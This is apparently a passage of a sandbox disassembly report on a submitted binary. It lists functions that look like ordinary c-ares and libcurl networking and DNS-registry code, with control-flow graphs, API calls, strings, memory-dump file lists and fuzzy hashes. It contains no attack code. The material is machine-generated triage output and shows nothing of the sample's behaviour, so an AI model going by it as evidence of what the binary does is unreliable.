                                                              • Instruction Fuzzy Hash: AD117DB6A053087BE922A714AC5AE373B6CDBC1B6CF060918F90463382D2219D0482F1
                                                              Function 004BB180 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1473 4bb180-4bb195 1474 4bb19b-4bb1a2 1473->1474 1475 4bb3e0-4bb3e7 1473->1475 1476 4bb1b0-4bb1b9 1474->1476 1476->1476 1477 4bb1bb-4bb1bd 1476->1477 1477->1475 1478 4bb1c3-4bb1d0 1477->1478 1480 4bb3db 1478->1480 1481 4bb1d6-4bb1f2 1478->1481 1480->1475 1482 4bb229-4bb22d 1481->1482 1483 4bb3e8-4bb417 1482->1483 1484 4bb233-4bb246 1482->1484 1491 4bb41d-4bb429 1483->1491 1492 4bb582-4bb589 1483->1492 1485 4bb248-4bb24b 1484->1485 1486 4bb260-4bb264 1484->1486 1487 4bb24d-4bb256 1485->1487 1488 4bb215-4bb223 1485->1488 1490 4bb269-4bb286 call 4baf30 1486->1490 1487->1490 1488->1482 1494 4bb315-4bb33c call 778b00 1488->1494 1501 4bb288-4bb2a3 call 4bb060 1490->1501 1502 4bb2f0-4bb301 1490->1502 1496 4bb42b-4bb433 call 4bb590 1491->1496 1497 4bb435-4bb44c call 4bb590 1491->1497 1504 4bb3bf-4bb3ca 1494->1504 1505 4bb342-4bb347 1494->1505 1496->1497 1512 4bb458-4bb471 call 4bb590 1497->1512 1513 4bb44e-4bb456 call 4bb590 1497->1513 1518 4bb2a9-4bb2c7 getsockname call 4bb020 1501->1518 1519 4bb200-4bb213 call 4bb020 1501->1519 1502->1488 1522 4bb307-4bb310 1502->1522 1514 4bb3cc-4bb3d9 1504->1514 1509 4bb349-4bb358 1505->1509 1510 4bb384-4bb38f 1505->1510 1516 4bb360-4bb382 1509->1516 1510->1504 1517 4bb391-4bb3a5 1510->1517 1531 4bb48c-4bb4a7 1512->1531 1532 4bb473-4bb487 1512->1532 1513->1512 1514->1475 1516->1510 1516->1516 1523 4bb3b0-4bb3bd 1517->1523 1529 4bb2cc-4bb2dd 1518->1529 1519->1488 1522->1514 1523->1504 1523->1523 1529->1488 1535 4bb2e3 1529->1535 1533 4bb4a9-4bb4b1 call 4bb660 1531->1533 1534 4bb4b3-4bb4cb call 4bb660 1531->1534 1532->1492 1533->1534 1540 4bb4d9-4bb4f5 call 4bb660 1534->1540 1541 4bb4cd-4bb4d5 call 4bb660 1534->1541 1535->1522 1546 4bb50d-4bb52b call 4bb770 * 2 1540->1546 1547 4bb4f7-4bb50b 1540->1547 1541->1540 1546->1492 1552 4bb52d-4bb531 1546->1552 1547->1492 1553 4bb533-4bb53b 1552->1553 1554 4bb580 1552->1554 1555 4bb578-4bb57e 1553->1555 1556 4bb53d-4bb547 1553->1556 1554->1492 1555->1492 1556->1555 1557 4bb549-4bb54d 1556->1557 1557->1555 1558 4bb54f-4bb558 1557->1558 1558->1555 1559 4bb55a-4bb576 call 4bb870 * 2 1558->1559 1559->1492 1559->1555
                                                              APIs
                                                              • getsockname.WS2_32(-00000020,-00000020,?), ref: 004BB2B7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: getsockname
                                                              • String ID: ares__sortaddrinfo.c$cur != NULL
                                                              • API String ID: 3358416759-2430778319
                                                              • Opcode ID: f1035f602a43a3d8ac795d5ac9ce6370a7d6ffb325173eefb1ccf704df22de19
                                                              • Instruction ID: 3ec42dc51600bb3d1deb0bc67d16491840b9420853bdab1b9c6ab4d87e81051c
                                                              • Opcode Fuzzy Hash: f1035f602a43a3d8ac795d5ac9ce6370a7d6ffb325173eefb1ccf704df22de19
                                                              • Instruction Fuzzy Hash: 4EC181316043059FD718DF25C884AAA77E1FF88344F04886EE8858B3A1D7B8ED45CBE6
                                                              Function 00406FA0 Relevance: 1.8, APIs: 1, Instructions: 261COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: a9a5ae7d8d2784793dfd4672150c973173446f5f1fdbf640c7ba1c8d7f604950
                                                              • Instruction ID: f7532c5fd321a978369caf44dc1a1df9dee4274207c00733693df04783148d5f
                                                              • Opcode Fuzzy Hash: a9a5ae7d8d2784793dfd4672150c973173446f5f1fdbf640c7ba1c8d7f604950
                                                              • Instruction Fuzzy Hash: CE913530A0D3494BE7358A2888907BB72D5EFC4364F148B3EE899572D4EB78BC41D697
                                                              Function 003F31D7 Relevance: 1.3, APIs: 1, Instructions: 73COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: CloseHandle
                                                              • String ID:
                                                              • API String ID: 2962429428-0
                                                              • Opcode ID: 5f4085d7679dcc8779b9d45bf26a22a218198c7068da2cbdb1b89d8f0a06592c
                                                              • Instruction ID: 9edf53a0bbdd75577f8b2d23385b07ea77e46352ae5418c171bcae9bba61fac4
                                                              • Opcode Fuzzy Hash: 5f4085d7679dcc8779b9d45bf26a22a218198c7068da2cbdb1b89d8f0a06592c
                                                              • Instruction Fuzzy Hash: 0231B6B49093149BCB10EFB8D5896AEBBF0FF44344F018869E898E7255E774DA44CF52
                                                              Function 004AA440 Relevance: 44.8, APIs: 17, Strings: 8, Instructions: 1066registryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 004AAA19
                                                              • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 004AAA4C
                                                              • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 004AAA97
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 004AAAE9
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 004AAB30
                                                              • RegCloseKey.KERNELBASE(?), ref: 004AAB6A
                                                              • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 004AAB82
                                                              • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 004AAC46
                                                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 004AAD0A
                                                              • RegEnumKeyExA.KERNELBASE ref: 004AAD8D
                                                              • RegCloseKey.KERNELBASE(?), ref: 004AADD9
                                                              • RegEnumKeyExA.KERNELBASE ref: 004AAE08
                                                              • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 004AAE2A
                                                              • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 004AAE54
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 004AAF63
                                                              • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 004AAFB2
                                                              • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 004AB072
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: QueryValue$Open$CloseEnum
                                                              • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                                              • API String ID: 4217438148-1047472027
                                                              • Opcode ID: 1fa57141601df77e05271057dfe48d5cae018589270b1bfa8610a7a0f309a083
                                                              • Instruction ID: 582717d6119b175fd941b12071fafa31e9a627f5e0b53a0d3844ab42af46561b
                                                              • Opcode Fuzzy Hash: 1fa57141601df77e05271057dfe48d5cae018589270b1bfa8610a7a0f309a083
                                                              • Instruction Fuzzy Hash: 0772F1B1608301AFE710DB24CC85B6BB7E8EF96700F14492DF985972A2E779E814CB57
                                                              Function 0042A550 Relevance: 28.8, APIs: 1, Strings: 15, Instructions: 794COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 0042A832
                                                              Strings
                                                              • @, xrefs: 0042A8F4
                                                              • Local Interface %s is ip %s using address family %i, xrefs: 0042AE60
                                                              • Trying [%s]:%d..., xrefs: 0042A689
                                                              • @, xrefs: 0042AC42
                                                              • bind failed with errno %d: %s, xrefs: 0042B080
                                                              • Bind to local port %d failed, trying next, xrefs: 0042AFE5
                                                              • Could not set TCP_NODELAY: %s, xrefs: 0042A871
                                                              • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 0042AD0A
                                                              • Name '%s' family %i resolved to '%s' family %i, xrefs: 0042ADAC
                                                              • Couldn't bind to '%s' with errno %d: %s, xrefs: 0042AE1F
                                                              • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 0042A6CE
                                                              • cf-socket.c, xrefs: 0042A5CD, 0042A735
                                                              • cf_socket_open() -> %d, fd=%d, xrefs: 0042A796
                                                              • Trying %s:%d..., xrefs: 0042A7C2, 0042A7DE
                                                              • Local port: %hu, xrefs: 0042AF28
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: setsockopt
                                                              • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                                              • API String ID: 3981526788-2373386790
                                                              • Opcode ID: 2b723bbb42e4c16012b8569c111b39e6ae8a900587b0ffc9a263baa562dd8b0c
                                                              • Instruction ID: 6066b3860d41c3852084492d52d98422df844e83209eb9fa98d63275a2272a8c
                                                              • Opcode Fuzzy Hash: 2b723bbb42e4c16012b8569c111b39e6ae8a900587b0ffc9a263baa562dd8b0c
                                                              • Instruction Fuzzy Hash: 58620471604340ABE720CF14E845BABB7E4BF84308F44492EFD8897292E779E955CB97
                                                              Function 004B9740 Relevance: 16.5, APIs: 3, Strings: 6, Instructions: 743registryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 631 4b9740-4b975b 632 4b975d-4b9768 call 4b78a0 631->632 633 4b9780-4b9782 631->633 640 4b99bb-4b99c0 632->640 641 4b976e-4b9770 632->641 635 4b9788-4b97a0 call 778e00 call 4b78a0 633->635 636 4b9914-4b994e call 778b70 RegOpenKeyExA 633->636 635->640 645 4b97a6-4b97c5 635->645 648 4b995a-4b9992 RegQueryValueExA RegCloseKey call 778b98 636->648 649 4b9950-4b9955 636->649 646 4b9a0c-4b9a15 640->646 644 4b9772-4b977e 641->644 641->645 644->635 655 4b9827-4b9833 645->655 656 4b97c7-4b97e0 645->656 659 4b9997-4b99b5 call 4b78a0 648->659 649->646 660 4b985f-4b9872 call 4b5ca0 655->660 661 4b9835-4b985c call 4ae2b0 * 2 655->661 657 4b97e2-4b97f3 call 778b50 656->657 658 4b97f6-4b9809 656->658 657->658 658->655 670 4b980b-4b9810 658->670 659->640 659->645 671 4b9878-4b987d call 4b77b0 660->671 672 4b99f0 660->672 661->660 670->655 675 4b9812-4b9822 670->675 680 4b9882-4b9889 671->680 674 4b99f5-4b99fb call 4b5d00 672->674 685 4b99fe-4b9a09 674->685 675->646 680->674 684 4b988f-4b989b call 4a4fe0 680->684 684->672 690 4b98a1-4b98c3 call 778b50 call 4b78a0 684->690 685->646 695 4b98c9-4b98db call 4ae2d0 690->695 696 4b99c2-4b99ed call 4ae2b0 * 2 690->696 695->696 700 4b98e1-4b98f0 call 4ae2d0 695->700 696->672 700->696 706 4b98f6-4b9905 call 4b63f0 700->706 711 4b990b-4b990f 706->711 712 4b9f66-4b9f7f call 4b5d00 706->712 714 4b9a3f-4b9a5a call 4b6740 call 4b63f0 711->714 712->685 714->712 720 4b9a60-4b9a6e call 4b6d60 714->720 723 4b9a1f-4b9a39 call 4b6840 call 4b63f0 720->723 724 4b9a70-4b9a94 call 4b6200 call 4b67e0 call 4b6320 720->724 723->712 723->714 735 4b9a16-4b9a19 724->735 736 4b9a96-4b9ac6 call 4ad120 724->736 735->723 737 4b9fc1 735->737 741 4b9ac8-4b9adb call 4ad120 736->741 742 4b9ae1-4b9af7 call 4ad190 736->742 740 4b9fc5-4b9ffd call 4b5d00 call 4ae2b0 * 2 737->740 740->685 741->723 741->742 742->723 749 4b9afd-4b9b09 call 4a4fe0 742->749 749->737 756 4b9b0f-4b9b29 call 4ae730 749->756 761 4b9b2f-4b9b3a call 4b78a0 756->761 762 4b9f84-4b9f88 756->762 761->762 768 4b9b40-4b9b54 call 4ae760 761->768 763 4b9f95-4b9f99 762->763 765 4b9f9b-4b9f9e 763->765 766 4b9fa0-4b9fb6 call 4aebf0 * 2 763->766 765->737 765->766 778 4b9fb7-4b9fbe 766->778 774 4b9f8a-4b9f92 768->774 775 4b9b5a-4b9b6e call 4ae730 768->775 774->763 781 4b9b8c-4b9b97 call 4b63f0 775->781 782 4b9b70-4ba004 775->782 778->737 790 4b9c9a-4b9cab call 4aea00 781->790 791 4b9b9d-4b9bbf call 4b6740 call 4b63f0 781->791 786 4ba015-4ba01d 782->786 788 4ba01f-4ba022 786->788 789 4ba024-4ba045 call 4aebf0 * 2 786->789 788->740 788->789 789->740 799 4b9f31-4b9f35 790->799 800 4b9cb1-4b9ccd call 4aea00 call 4ae960 790->800 791->790 808 4b9bc5-4b9bda call 4b6d60 791->808 804 4b9f40-4b9f61 call 4aebf0 * 2 799->804 805 4b9f37-4b9f3a 799->805 819 4b9ccf 800->819 820 4b9cfd-4b9d0e call 4ae960 800->820 804->723 805->723 805->804 808->790 818 4b9be0-4b9bf4 call 4b6200 call 4b67e0 808->818 818->790 839 4b9bfa-4b9c0b call 4b6320 818->839 823 4b9cd1-4b9cec call 4ae9f0 call 4ae4a0 819->823 828 4b9d53-4b9d55 820->828 829 4b9d10 820->829 840 4b9cee-4b9cfb call 4ae9d0 823->840 841 4b9d47-4b9d51 823->841 832 4b9e69-4b9e8e call 4aea40 call 4ae440 828->832 833 4b9d12-4b9d2d call 4ae9f0 call 4ae4a0 829->833 856 4b9e90-4b9e92 832->856 857 4b9e94-4b9eaa call 4ae3c0 832->857 860 4b9d5a-4b9d6f call 4ae960 833->860 861 4b9d2f-4b9d3c call 4ae9d0 833->861 854 4b9c11-4b9c1c call 4b7b70 839->854 855 4b9b75-4b9b86 call 4aea00 839->855 840->820 840->823 846 4b9dca-4b9ddb call 4ae960 841->846 866 4b9e2e-4b9e36 846->866 867 4b9ddd-4b9ddf 846->867 854->781 871 4b9c22-4b9c33 call 4ae960 854->871 855->781 877 4b9f2d 855->877 864 4b9eb3-4b9ec4 call 4ae9c0 856->864 887 4ba04a-4ba04c 857->887 888 4b9eb0-4b9eb1 857->888 883 4b9dc2 860->883 884 4b9d71-4b9d73 860->884 861->833 880 4b9d3e-4b9d42 861->880 864->723 896 4b9eca-4b9ed0 864->896 873 4b9e38-4b9e3b 866->873 874 4b9e3d-4b9e5b call 4aebf0 * 2 866->874 876 4b9e06-4b9e21 call 4ae9f0 call 4ae4a0 867->876 898 4b9c66-4b9c75 call 4b78a0 871->898 899 4b9c35 871->899 873->874 885 4b9e5e-4b9e67 873->885 874->885 914 4b9e23-4b9e2c call 4aeac0 876->914 915 4b9de1-4b9dee call 4aec80 876->915 877->799 880->832 883->846 894 4b9d9a-4b9db5 call 4ae9f0 call 4ae4a0 884->894 885->832 885->864 892 4ba04e-4ba051 887->892 893 4ba057-4ba070 call 4aebf0 * 2 887->893 888->864 892->737 892->893 893->778 928 4b9db7-4b9dc0 call 4aeac0 894->928 929 4b9d75-4b9d82 call 4aec80 894->929 897 4b9ee5-4b9ef2 call 4ae9f0 896->897 897->723 920 4b9ef8-4b9f0e call 4ae440 897->920 925 4b9c7b-4b9c8f call 4ae7c0 898->925 926 4ba011 898->926 905 4b9c37-4b9c51 call 4ae9f0 899->905 905->781 944 4b9c57-4b9c64 call 4ae9d0 905->944 938 4b9df1-4b9e04 call 4ae960 914->938 915->938 942 4b9ed2-4b9edf call 4ae9e0 920->942 943 4b9f10-4b9f26 call 4ae3c0 920->943 925->781 939 4b9c95-4ba00e 925->939 926->786 948 4b9d85-4b9d98 call 4ae960 928->948 929->948 938->866 938->876 939->926 942->723 942->897 943->942 958 4b9f28 943->958 944->898 944->905 948->883 948->894 958->737
                                                              APIs
                                                              • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 004B9946
                                                              • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 004B9974
                                                              • RegCloseKey.KERNELBASE(?), ref: 004B998B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2024461300.00000000003F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 003F0000, based on PE: true
                                                              • Associated: 00000000.00000002.2024439507.00000000003F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2024461300.0000000000AC9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025247401.0000000000ACC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000ACE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000C4F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025266174.0000000000E4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025567078.0000000000E4F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025667068.0000000000FFA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2025682572.0000000000FFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_3f0000_BkB1ur7aFW.jbxd
                                                              Similarity
                                                              • API ID: CloseOpenQueryValue
                                                              • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos
                                                              • API String ID: 3677997916-615551945
                                                              • Opcode ID: 5900d5c894c47e7cbe8e13a504b5f80ce26ac05a07f6586f03b551eaeb9348cf
                                                              • Instruction ID: 70d785e7f9f53e6693fee749489267baec072a35c993da2ed459f8d8da26a19f
                                                              • Opcode Fuzzy Hash: 5900d5c894c47e7cbe8e13a504b5f80ce26ac05a07f6586f03b551eaeb9348cf
                                                              • Instruction Fuzzy Hash: FA32EAF19042019BEB11AB22EC42A9776E8AF55318F08443AFD0996363F739ED15C77B
                                                              Function 00428B50 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 269networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

